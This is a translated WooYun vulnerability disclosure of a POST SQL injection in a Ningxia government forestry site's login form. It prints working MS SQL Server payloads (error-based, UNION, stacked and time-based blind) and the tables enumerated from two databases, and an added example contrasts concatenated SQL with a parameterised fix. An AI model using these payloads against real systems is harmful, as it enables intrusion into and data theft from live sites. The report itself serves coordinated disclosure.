
Vulnerability summary

Defect ID: wooyun-2015-0124661

Title: China Forestry Network (Ningxia Forestry Network) POST-type SQL injection (government site information disclosure)

Vendor: Ningxia Forestry Network (宁夏林业网)

Author: ShAdow丶

Submitted: 2015-07-10 06:44

Fixed: 2015-08-28 16:42

Disclosed: 2015-08-28 16:42

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 12

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-10: Details sent to the vendor, awaiting vendor handling
2015-07-14: Vendor confirmed; details visible to the vendor only
2015-07-24: Details disclosed to core white hats and relevant domain experts
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public

Brief description:

I submitted this before, but it did not pass review; maybe because I only provided the databases and did not list the tables. There is actually a lot of related information involved.

Details:



Place: POST
Parameter: UserName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: UserName=admin' AND 9534=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(121)+
CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (9534=9534) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(58)+CHAR(101)+CHAR(100)+CHAR(119)+CHAR(58))) AND 'Nsxl'='Nsxl&PWD=sss
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: UserName=admin' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL
, CHAR(58)+CHAR(110)+CHAR(121)+CHAR(103)+CHAR(58)+CHAR(83)+CHAR(117)+CHAR(70)+CH
AR(80)+CHAR(68)+CHAR(66)+CHAR(87)+CHAR(80)+CHAR(106)+CHAR(71)+CHAR(58)+CHAR(101)
+CHAR(100)+CHAR(119)+CHAR(58), NULL, NULL, NULL-- &PWD=sss
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: UserName=admin'; WAITFOR DELAY '0:0:5';--&PWD=sss
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: UserName=admin' WAITFOR DELAY '0:0:5'--&PWD=sss


Last time I only provided these databases and stopped there without going any deeper.



This time I went further.

Database: Northwind
[32 tables]
+--------------------------------------+
| dbo.Categories |
| dbo.CustomerCustomerDemo |
| dbo.CustomerDemographics |
| dbo.Customers |
| dbo.EmployeeTerritories |
| dbo.Employees |
| dbo.Invoices |
| dbo.Region |
| dbo.Shippers |
| dbo.Suppliers |
| dbo.Territories |
| dbo.[Alphabetical list of products] |
| dbo.[Category Sales for 1997] |
| dbo.[Current Product List] |
| dbo.[Customer and Suppliers by City] |
| dbo.[Order Details Extended] |
| dbo.[Order Details Extended] |
| dbo.[Order Subtotals] |
| dbo.[Orders Qry] |
| dbo.[Orders Qry] |
| dbo.[Product Sales for 1997] |
| dbo.[Products Above Average Price] |
| dbo.[Products Above Average Price] |
| dbo.[Products by Category] |
| dbo.[Quarterly Orders] |
| dbo.[Sales Totals by Amount] |
| dbo.[Sales by Category] |
| dbo.[Summary of Sales by Quarter] |
| dbo.[Summary of Sales by Year] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------+


As you can see, there is a lot of related information: yearly sales figures, product prices, employees, and so on. I think this should be enough to prove the importance of this hole. I will not go into the table contents in detail; after all, it is a government site

Proof of vulnerability:

Below are the tables of the other relatively important database

Database: nx_lyt
[32 tables]
+---------------------+
| dbo.Admin |
| dbo.Affiche |
| dbo.Article |
| dbo.ArticleClass |
| dbo.Cities |
| dbo.Counter |
| dbo.Customers |
| dbo.D99_CMD |
| dbo.D99_REG |
| dbo.Depart |
| dbo.Link |
| dbo.Order_Titles |
| dbo.Pop_window |
| dbo.Public_news |
| dbo.Userandip |
| dbo.Vote |
| dbo.WebCount |
| dbo.X_4401 |
| dbo.X_5512 |
| dbo.X_7508 |
| dbo.Zzday |
| dbo.[nxfor.D99_Tmp] |
| dbo.comd_list |
| dbo.dtproperties |
| dbo.form |
| dbo.link_tu |
| dbo.quhua |
| dbo.qushu |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.vote_class |
| dbo.vote_vote |
+---------------------+

This should pass review now, dear reviewers

Fix recommendation:

Filtering

Copyright notice: when reposting, please credit the source: ShAdow丶@WooYun
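Added example, not part of the original report or the site's code: the class of bug shown above is a login query built by concatenating the POST parameters into SQL text, and the durable fix is to bind them as query parameters so the database driver treats them as data rather than as SQL. The table and column names (Admin, UserName, PWD) are assumed from the report's POST parameters and table listing; the data is constructed, and an in-memory SQLite database stands in for SQL Server.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the site's SQL Server "Admin" table.
    # Table/column names are assumed from the report; the row is made up.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Admin (UserName TEXT, PWD TEXT)")
    conn.execute("INSERT INTO Admin VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_unsafe(conn, username, password):
    # The pattern behind the report: request values spliced into the SQL text.
    # A quote or comment marker inside UserName changes the query's structure,
    # which is what the error-based, UNION and WAITFOR payloads above rely on.
    sql = (
        "SELECT 1 FROM Admin WHERE UserName = '" + username
        + "' AND PWD = '" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    # Fix: the SQL text is a constant; the values travel separately as bound
    # parameters, so quotes, comments and keywords in them are just characters
    # of a string compared against the column. "?" is the placeholder for
    # sqlite3 and also for pyodbc against SQL Server.
    sql = "SELECT 1 FROM Admin WHERE UserName = ? AND PWD = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Same inputs, two implementations: the parameterised one only accepts
    # the real credentials; the concatenated one is steered by the input.
    for user, pwd in [("admin", "correct-horse"), ("admin", "wrong"), ("admin'--", "wrong")]:
        print(repr(user), "unsafe:", login_unsafe(db, user, pwd), "safe:", login_safe(db, user, pwd))
```

The comparison in `login_safe` still does a plaintext password match, which mirrors the shape of the original query; in a real fix the PWD column would hold a salted hash and the comparison would happen in application code after the parameterised lookup.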


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 9

Confirmed: 2015-07-14 16:41

Vendor reply:

CNVD has confirmed the described situation and has passed it via CNCERT to the Ningxia branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet